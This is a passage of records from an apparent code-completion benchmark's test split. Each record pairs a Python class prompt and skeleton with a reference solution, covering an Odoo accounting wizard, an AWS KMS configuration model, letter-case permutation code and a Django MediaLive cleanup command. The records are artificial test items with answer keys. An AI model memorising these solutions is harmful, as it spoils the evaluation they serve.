"data/stack_v2_sparse_classes_30k", "solution": "class account_tree:\n \"\"\"This model to update consolidation chart of account and validate the account not belong in consolidate accounts\"\"\"\n\n def uniq(self, cr, uid, ids):\n \"\"\"Get account id from all charts of account @return: List of account ids\"\"\"\n output = []\n accounts = []\n for x in ids:\n if x not in accounts:\n accounts.append(x)\n else:\n output.append(x)\n return output\n\n def validate_move(self, cr, uid, ids, context=None):\n \"\"\"Validate all accounts belong in consolidation account or not @return: dictionary of values\"\"\"\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n 
obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n", "source": "the_stack_v2_python_sparse", "source_path": "v_7/GDS/common_shamil_v3/account_custom/wizard/account_tree.py", "source_repo": "musabahmed/baba", "split": "test", "star_events_count": 0} {"blob_id": "af01f5fd79cc664a79cbc881d9b21e07ff36c642", "bodies": ["self.access_key_id = access_key_id\nself.auth_method = auth_method\nself.ca_certificate = ca_certificate\nself.cmk_alias = cmk_alias\nself.cmk_arn = cmk_arn\nself.cmk_key_id = cmk_key_id\nself.iam_role_arn = iam_role_arn\nself.region = region\nself.secret_access_key = secret_access_key\nself.verify_s_s_l = verify_s_s_l", "if dictionary is None:\n return None\naccess_key_id = dictionary.get('accessKeyId')\nauth_method = dictionary.get('authMethod')\nca_certificate = dictionary.get('caCertificate')\ncmk_alias = dictionary.get('cmkAlias')\ncmk_arn = dictionary.get('cmkArn')\ncmk_key_id = dictionary.get('cmkKeyId')\niam_role_arn = dictionary.get('iamRoleArn')\nregion = dictionary.get('region')\nsecret_access_key = dictionary.get('secretAccessKey')\nverify_s_s_l = dictionary.get('verifySSL')\nreturn cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)"], "bodies_text": "<|body_start_0|>\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n 
self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):", "class_name": "AwsKmsConfiguration", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000413", "length_bytes": 4533, "license_type": "permissive", "methods": [{"docstring": "Constructor for the AwsKmsConfiguration class", "name": "__init__", "signature": "def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `AwsKmsConfiguration` described below.\n\nClass description:\nImplementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\n\nMethod signatures and docstrings:\n- def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None): Constructor for the AwsKmsConfiguration class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `AwsKmsConfiguration` described below.\n\nClass description:\nImplementation of the 'AwsKmsConfiguration' model. 
TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\n\nMethod signatures and docstrings:\n- def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None): Constructor for the AwsKmsConfiguration class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. 
cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/aws_kms_configuration.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "f12217cde314af78647de5b541f82c4004fde46f", "bodies": ["res = ['']\nfor ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\nreturn res", "length = len(S)\nif length == 0:\n return ['']\nimport collections\nqueue = collections.deque()\nqueue.append('')\nlevel = -1\nwhile True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\nreturn list(queue)", "length = len(S)\nif length == 0:\n return ['']\nres = []\nch = S[0]\nfor item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\nreturn res"], "bodies_text": "<|body_start_0|>\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return 
list(queue)\n<|end_body_1|>\n\n<|body_start_2|>\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_0|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n<|end_body_1|>\n\n<|body_start_2|>\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000414", "length_bytes": 3222, "license_type": "no_license", "methods": [{"docstring": ":type S: str :rtype: List[str]", "name": "letterCasePermutation", "signature": "def letterCasePermutation(self, S)"}, {"docstring": ":type S: str :rtype: List[str]", "name": "letterCasePermutation_v1", "signature": "def letterCasePermutation_v1(self, S)"}, {"docstring": ":type S: str :rtype: List[str]", "name": "letterCasePermutation_v1", "signature": "def letterCasePermutation_v1(self, S)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007199", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def letterCasePermutation(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def letterCasePermutation(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]\n\n<|skeleton|>\nclass Solution:\n\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_0|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str 
:rtype: List[str]\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n<|end_body_1|>\n\n<|body_start_2|>\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n<|end_body_2|>\n", "revision_id": "98fb752c574a6ec5961a274e41a44275b56da194", "skeleton": "<|skeleton|>\nclass Solution:\n\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_0|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "Challenges/letterCasePermutation.py", "source_repo": "AusCommsteam/Algorithm-and-Data-Structures-and-Coding-Challenges", "split": "test", "star_events_count": 0} {"blob_id": "25ffbaeb0c583799a0f7dd43eb4b845a30dab815", "bodies": ["expired_date = generate_expired_date()\nfor medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n 
self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)", "self.stdout.write(f'deleting AWS resources for video {live.id}')\ndelete_medialive_stack(medialive_channel, self.stdout)\nself.stdout.write(f'Set video state to deleted for video {live.id}')\nlive.live_state = ENDED\nlive.upload_state = DELETED\nlive.live_info.pop('medialive')\nlive.live_info.pop('mediapackage')\nlive.save(update_fields=('live_state', 'upload_state', 'live_info'))"], "bodies_text": "<|body_start_0|>\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n<|end_body_0|>\n\n<|body_start_1|>\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n<|end_body_1|>\n", "class_docstring": "Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.", "class_name": "Command", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. 
If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n <|body_0|>\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n<|end_body_0|>\n\n<|body_start_1|>\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000415", "length_bytes": 4123, "license_type": "permissive", "methods": [{"docstring": "Execute management command.", "name": "handle", "signature": "def handle(self, *args, **options)"}, {"docstring": "Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources", "name": "_delete_live", "signature": "def _delete_live(self, live, medialive_channel)"}], "n_methods": 2, "prompt": "Implement the Python class `Command` described below.\n\nClass description:\nOnce a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\n\nMethod signatures and docstrings:\n- def handle(self, *args, **options): Execute management command.\n- def _delete_live(self, live, medialive_channel): Set the live_state 